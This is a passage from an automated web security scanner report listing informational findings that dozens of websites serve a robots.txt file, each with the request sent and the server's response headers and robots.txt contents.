Last-Modified: Tue, 18 May 2004 16:06:46 GMT
Accept-Ranges: bytes
ETag: "0af381ef23cc41:a81"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:57:33 GMT
Connection: close

User-agent: *
Disallow: /

26.266. http://www.craigslist.at/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.craigslist.at
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.craigslist.at

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Fri, 18 Dec 2009 01:10:13 GMT
Accept-Ranges: bytes
Date: Tue, 03 May 2011 10:19:27 GMT
Vary: Accept-Encoding
Content-Length: 665
Content-Type: text/plain
Server: Apache
X-Pad: avoid browser bug

##############################
# Exclude robots from these

User-agent: YahooFeedSeeker
Disallow: /forums
Disallow: /res/
Disallow: /post
Disallow: /email.friend
Disallow: /reply
Disallow: /?flagCode

...[SNIP]...

26.267. http://www.createdebate.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.createdebate.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.createdebate.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:09:55 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a FrontPage/5.0.2.2635 mod_bwlimited/1.4 mod_auth_passthrough/2.1
Last-Modified: Fri, 20 Mar 2009 08:55:41 GMT
ETag: "d503c7-d9-4658914d0dd40"
Accept-Ranges: bytes
Content-Length: 217
Cache-Control: max-age=5184000
Expires: Sat, 02 Jul 2011 11:09:55 GMT
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /uploads
Disallow: /argument/newarg/
Disallow: /user/login/argument/
Disallow: /user/login/debate/
Disallow: /counter/
disallow: /debate/newdebate/vs/
disallow: /debate/
...[SNIP]...

26.268. http://www.credentialsops.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.credentialsops.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.credentialsops.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:19:51 GMT
Server: Apache
Last-Modified: Sat, 25 Jul 2009 03:12:47 GMT
ETag: "105b4-27-185b29c0"
Accept-Ranges: bytes
Content-Length: 39
Connection: close
Content-Type: text/plain; charset=windows-1252

# go away
User-agent: *
Disallow: /

26.269. http://www.criminal-records.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criminal-records.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.criminal-records.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:16:51 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e DAV/2 PHP/5.2.14
Last-Modified: Fri, 14 Nov 2008 23:02:18 GMT
ETag: "ace84d-72-45bae388c5280"
Accept-Ranges: bytes
Content-Length: 114
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# Robots.txt file from http://criminal-records.org/
#
# All robots will spider the domain

User-agent: *
Disallow:

26.270. http://www.criterion.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criterion.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.criterion.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Tue, 03 May 2011 11:38:07 GMT
Content-Type: text/plain
Content-Length: 50
Last-Modified: Tue, 05 Oct 2010 15:08:59 GMT
Connection: close
Accept-Ranges: bytes

User-Agent: *
Disallow: /cart
Disallow: /checkout

26.271. http://www.crosswordheaven.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.crosswordheaven.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.crosswordheaven.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "-672998580"
Last-Modified: Sun, 13 Jun 2010 01:17:28 GMT
Content-Length: 79
Connection: close
Date: Tue, 03 May 2011 10:22:11 GMT
Server: lighttpd/1.4.26

User-agent: *
Allow: /

Sitemap: http://crosswordheaven.com/sitemapindex.xml

26.272. http://www.crownreef.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.crownreef.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.crownreef.com

Response

HTTP/1.1 200 OK
Xet-Cookie:
Age: 733
Date: Tue, 03 May 2011 11:10:55 GMT
Connection: Keep-Alive
Via: NS-CACHE-8.0: 1
ETag: "3efa029956c81:474"
Content-Length: 150
Content-Type: text/plain
Last-Modified: Thu, 04 Oct 2007 14:45:09 GMT
Accept-Ranges: bytes
X-Powered-By: ASP.NET

# robots.txt for http://www.template.com/

User-agent: *
Disallow: /_common/ # This is an Common virtual URL
Disallow: /images/ # Images Files

26.273. http://www.crystal-co.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.crystal-co.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.crystal-co.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:51:00 GMT
Server: Apache
Last-Modified: Wed, 17 Mar 2010 02:11:16 GMT
ETag: "474e4-46-a1101900"
Accept-Ranges: bytes
Content-Length: 70
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
Sitemap: http://www.crystal-co.com/sitemap.xml

26.274. http://www.ctnow.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ctnow.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ctnow.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8l mod_onsint/1.0
Last-Modified: Thu, 28 Jan 2010 02:39:05 GMT
ETag: "78d0aa-4b-6c290440"
Content-Type: text/plain
Date: Tue, 03 May 2011 10:40:40 GMT
Content-Length: 75
Connection: close

User-agent: *
Disallow: /search/
Sitemap: http://www.ctnow.com/sitemap.xml

26.275. http://www.cure-back-pain.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cure-back-pain.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cure-back-pain.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:18:57 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.cure-back-pain.org/rU34tCRn.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallow: /dyn/

...[SNIP]...

26.276. http://www.curiousread.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.curiousread.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.curiousread.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain; charset=UTF-8
Expires: Mon, 02 May 2011 21:34:29 GMT
Date: Mon, 02 May 2011 21:34:29 GMT
Last-Modified: Fri, 29 Apr 2011 14:00:03 GMT
ETag: "20d5a0bf-9522-4a42-a1b8-04e8cc5d877c"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Age: 48274
Cache-Control: public, max-age=86400, proxy-revalidate, must-revalidate

User-agent: Mediapartners-Google
Disallow:

User-agent: *
Disallow: /search
Disallow: /related-content.g
Disallow: /related_content_helper.html

Sitemap: http://www.curiousread.com/feeds/posts/defaul
...[SNIP]...

26.277. http://www.currclick.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.currclick.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.currclick.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:03:21 GMT
Server: Apache
Last-Modified: Tue, 21 Dec 2010 15:58:20 GMT
ETag: "2908516-14b9-b49bdf00"
Accept-Ranges: bytes
Content-Length: 5305
Connection: close
Content-Type: text/plain; charset=UTF-8

#
# robots.txt generated by www.1-hit.com's robot generator
# Please, we do NOT allow nonauthorized robots any longer.
#
User-agent: *
Disallow: /cgi-bin/

User-agent: *
Disallow: /admin/

U
...[SNIP]...

26.278. http://www.customtyping.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.customtyping.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.customtyping.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:07:40 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 22 Aug 2009 15:54:56 GMT
ETag: "9ee924-22-192d400"
Accept-Ranges: bytes
Content-Length: 34
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /cgi-bin/

26.279. http://www.cutesygirl.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cutesygirl.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cutesygirl.com

Response

HTTP/1.1 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Sat, 23 Apr 2011 23:05:16 GMT
Accept-Ranges: bytes
ETag: "ab70a8e8a2cc1:1a9d5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:49:58 GMT
Connection: close

User-agent: *
Disallow: /

26.280. http://www.cutravelrewards.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cutravelrewards.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cutravelrewards.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:39:05 GMT
Server: Apache
Last-Modified: Thu, 04 Feb 2010 00:43:46 GMT
ETag: "2460c0a-1a-47ebba0a51480"
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

26.281. http://www.d2jsp.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.d2jsp.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.d2jsp.org

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "180239398"
Last-Modified: Fri, 14 May 2004 18:42:38 GMT
Content-Length: 23
Connection: close
Date: Tue, 03 May 2011 10:17:08 GMT
Server: lighttpd/1.4.26

User-agent: *
Disallow:

26.282. http://www.dadamo.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dadamo.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dadamo.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:50:16 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sat, 03 Jan 2009 19:18:09 GMT
ETag: "4d85a1-45-eafd9e40"
Accept-Ranges: bytes
Content-Length: 69
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /clinic/intranet/
Disallow: /SWAMIGenoType/

26.283. http://www.daddario.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.daddario.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.daddario.com

Response

HTTP/1.1 200 OK
Content-Length: 47
Content-Type: text/plain
Last-Modified: Fri, 11 Dec 2009 21:47:13 GMT
Accept-Ranges: bytes
ETag: "c840f37fab7aca1:38f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 12:04:16 GMT
Connection: close

User-agent: *
Disallow: /
Disallow: /*.axd$

26.284. http://www.dailycognition.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dailycognition.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dailycognition.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:10:16 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
Last-Modified: Thu, 12 Feb 2009 12:36:39 GMT
ETag: "4278a49-1679-462b7f8c463c0"
Accept-Ranges: bytes
Content-Length: 5753
Connection: close
Content-Type: text/plain

User-agent: Slurp
Disallow: /*?archive*
Disallow: /*?subaction*
Disallow: /*?search=*
Disallow: /*?amp*
Disallow: /*?forumID=*
Disallow: /*?ref=*

User-agent: Googlebot
Disallow: /*?archive*
Disallow:
...[SNIP]...

26.285. http://www.dailyfx.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dailyfx.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dailyfx.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
ETag: W/"158-1299612069000"
Content-Type: text/plain
Cache-Control: max-age=600
Age: 483
Date: Tue, 03 May 2011 11:04:29 GMT
Last-Modified: Tue, 08 Mar 2011 19:21:09 GMT
Expires: Tue, 03 May 2011 11:09:02 GMT
Content-Length: 158
Connection: close

User-agent: *
sitemap: http://www.dailyfx.com/sitemap.xml
sitemap: http://www.dailyfx.com/news.xml
sitemap: http://www.dailyfx.com/sitemap-video.xml
Allow: /

26.286. http://www.dailynylongalleries.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dailynylongalleries.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dailynylongalleries.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:41:32 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.9
Last-Modified: Thu, 28 May 2009 14:52:11 GMT
ETag: "60c44d-22-4a1ea51b"
Accept-Ranges: bytes
Content-Length: 34
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

User-Agent: *
Disallow: /cgi-bin/

26.287. http://www.danomatic.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.danomatic.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.danomatic.com

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 10:30:59 GMT
Server: Apache/2.2.8 (Fedora)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.danomatic.com/xmlrpc.php
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

26.288. http://www.davison.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.davison.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.davison.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:35:48 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Fri, 24 Sep 2010 17:34:31 GMT
ETag: "11902e2-112-ca8d57c0"
Accept-Ranges: bytes
Content-Length: 274
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /legal/
Disallow: /code/
Disallow: /backup/
Disallow: /cgi-bin/
Disallow: /wp-admin/
Disallow: /wp-includes/
Disallow: /archive/
Disallow: /includes/
Disallow: /family
...[SNIP]...

26.289. http://www.daycare.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.daycare.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.daycare.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:47:28 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch11 mod_ssl/2.2.3 OpenSSL/0.9.8c
Last-Modified: Thu, 15 Jul 2010 02:54:37 GMT
ETag: "b8007-24d-390d3540"
Accept-Ranges: bytes
Content-Length: 589
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots

User-agent: *
Disallow:    /logs
Disallow:    /stats

User-agent:    Mozilla/3.01 (hotwired-test/0.1)
Disallow:    /logs
Disallow:    /stats

User-agent:    Slurp
Disallow:    /logs
Disallow:    /stats

Us
...[SNIP]...

26.290. http://www.daytonmetrolibrary.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.daytonmetrolibrary.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.daytonmetrolibrary.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:08:10 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.14 with Suhosin-Patch
Last-Modified: Mon, 18 Apr 2011 16:24:19 GMT
ETag: "47edbe2a-16d-4a133d2ce92c0"
Accept-Ranges: bytes
Content-Length: 365
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Di
...[SNIP]...

26.291. http://www.dealgirlsonline.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dealgirlsonline.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dealgirlsonline.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 18 Nov 2010 15:04:16 GMT
Accept-Ranges: bytes
ETag: "30f6abde3187cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:57:50 GMT
Connection: close
Content-Length: 253

###############################
#
#
User-agent: *
#
# list folders robots are not allowed to index
#
Disallow: /
#
# list specific files robots are not allowed to index
#
#Disallow: /direc
...[SNIP]...

26.292. http://www.dealitem.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dealitem.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dealitem.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Sat, 09 Apr 2011 22:52:46 GMT
Accept-Ranges: bytes
ETag: "d71330d88f7cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:29:12 GMT
Connection: close
Content-Length: 266

sitemap: http://www.dealitem.com/sitemap.xml
sitemap: http://www.dealitem.com/sitemapext.aspx

User-agent: Googlebot
Allow: /show-coupon-deal/
Disallow: /view/TakeMeToOffer.aspx

User-Agent: *
...[SNIP]...

26.293. http://www.deals2buy.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.deals2buy.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.deals2buy.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Date: Tue, 03 May 2011 10:32:32 GMT
ETag: "0b122f9789ccb1:0"
Last-Modified: Wed, 15 Dec 2010 16:56:10 GMT
Server: Microsoft-IIS/7.0
Content-Length: 190
Connection: Close

User-Agent: *
Disallow: /adm
Disallow: /admin
Disallow: /load
Disallow: /r
Disallow: /cr
Disallow: /fr
Disallow: /clickofdoom
Allow: /
Sitemap: http://www.deals2buy.com/site_map.xml

26.294. http://www.deanza.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.deanza.edu
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.deanza.edu

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:26:54 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 20 Jan 2011 16:31:07 GMT
ETag: "3b50018-af-49a49a91728c0"
Accept-Ranges: bytes
Content-Length: 175
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Language: en

# robots.txt
# 4/30/2003 modified 3/22/2004, 8/7/2007, 9/30/2009

User-agent: *
Disallow: /em
Disallow: /cgi-bin
Disallow: /images
Disallow: /template
Disallow: /studentvote

26.295. http://www.dearesq.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dearesq.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dearesq.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:05:01 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 05 May 2006 05:17:00 GMT
ETag: "106822e-18-41303a15e8b00"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:

26.296. http://www.deguate.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.deguate.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.deguate.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:27:18 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 25 Mar 2011 23:35:52 GMT
ETag: "9d0b30-19-49f570df56600"
Accept-Ranges: bytes
Content-Length: 25
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.297. http://www.dennysantennaservice.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dennysantennaservice.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dennysantennaservice.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:39:11 GMT
Server: Apache
Last-Modified: Sat, 30 Apr 2011 13:47:41 GMT
ETag: "74e32-8e-4a22308bf9638"
Accept-Ranges: bytes
Content-Length: 142
Vary: Accept-Encoding
ServerID: web02
Connection: close
Content-Type: text/plain

# Robots.txt file from http://www.dennysantennaservice.com

Sitemap: http://www.dennysantennaservice.com/sitemap.xml

User-agent: *
Disallow:

26.298. http://www.dermisil.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dermisil.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dermisil.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 03 May 2011 10:33:50 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Wed, 30 Jun 2010 23:42:31 GMT
ETag: "170-48a47e84527c0"
Accept-Ranges: bytes
Content-Length: 368
Vary: Accept-Encoding

User-agent: *
Disallow: /account.php
Disallow: /cart.php
Disallow: /checkout.php
Disallow: /finishorder.php
Disallow: /login.php
Disallow: /orderstatus.php
Disallow: /postreview.php
Disallow: /product
...[SNIP]...

26.299. http://www.designhousekitchens.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.designhousekitchens.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.designhousekitchens.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:18:41 GMT
Server: Apache
Last-Modified: Wed, 10 Dec 2008 20:12:19 GMT
ETag: "23eb0a-636-45db6e083aec0"
Accept-Ranges: bytes
Content-Length: 1590
Cache-Control: max-age=1209600
Expires: Tue, 17 May 2011 10:18:41 GMT
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

26.300. http://www.dex.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dex.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dex.com

Response

HTTP/1.1 200 OK
ETag: "1717-6e-4a899a2e"
Content-Type: text/plain
Last-Modified: Mon, 17 Aug 2009 17:58:06 GMT
Connection: Close
Server: Oracle-Application-Server-10g/10.1.2.0.2 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.0.2 (G;max-age=0+0;age=0;ecid=94478920201,0)
Content-Length: 110
Date: Sun, 07 Nov 2010 21:39:35 GMT
Accept-Ranges: bytes

User-agent: *
Disallow: /Templates/
Disallow: /.svn/
Disallow: /test/

Sitemap: http://www.dex.com/sitemap.xml

26.301. http://www.dezignwithaz.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dezignwithaz.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dezignwithaz.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:22:52 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 05 Aug 2008 05:31:32 GMT
Accept-Ranges: bytes
Content-Length: 2529
Connection: close
Content-Type: text/plain

# CRELoaded Generated Robots.txt
# Robot Exclusion File -- robots.txt
# Author: CRELoaded Team
# Last Updated : May 11th 2005
#enhancements by Ted C

User-Agent: *
Disallow: /admin/
Disallow
...[SNIP]...

26.302. http://www.dglobe.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dglobe.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dglobe.com

Response

HTTP/1.0 200 OK
Last-Modified: Tue, 12 Jan 2010 21:15:28 GMT
Accept-Ranges: bytes
Content-Length: 39
Content-Type: text/plain; charset=UTF-8
Server: Apache/2.2.3 (CentOS)
ETag: "3d9676e-27-47cfe27327c00"
X-Cache-Lookup: HIT from sc2.fccinteractive.com:80
Date: Tue, 03 May 2011 11:37:52 GMT
Connection: close

User-agent: *\
Disallow:/event/search/

26.303. http://www.diesel.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.diesel.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.diesel.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 29 Mar 2011 14:54:31 GMT
ETag: "437801e-1ce-3cd4b7c0"
Content-Type: text/plain
Date: Tue, 03 May 2011 10:38:55 GMT
Content-Length: 462
Connection: close

Sitemap: http://www.diesel.com/sitemap.xml
User-agent: *
Disallow: /alberto
Disallow: /crm
Disallow: /xml
Disallow: /swf
Disallow: /subsidiary
Disallow: /jointhebraves
Disallow: /hr
Disallow: /bestupi
...[SNIP]...

26.304. http://www.diethealthclub.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.diethealthclub.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.diethealthclub.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:28:25 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 09 Sep 2009 11:18:36 GMT
ETag: "2bf85bc-79-473233e78db00"
Accept-Ranges: bytes
Content-Length: 121
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /email_friend.php
Disallow: /feedback.php
Disallow: /suggest_treatment.php
Disallow: /*cat_id

26.305. http://www.direct.tv/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.direct.tv
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.direct.tv

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:28:51 GMT
Server: Apache
Last-Modified: Thu, 22 Jul 2010 10:20:35 GMT
ETag: "3a-48bf744d782c0"
Accept-Ranges: bytes
Content-Length: 58
Cache-Control: max-age=604800
Expires: Tue, 10 May 2011 11:28:51 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /landing_pages/
Disallow: /local/

26.306. http://www.directboats.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.directboats.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.directboats.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 16:09:58 GMT
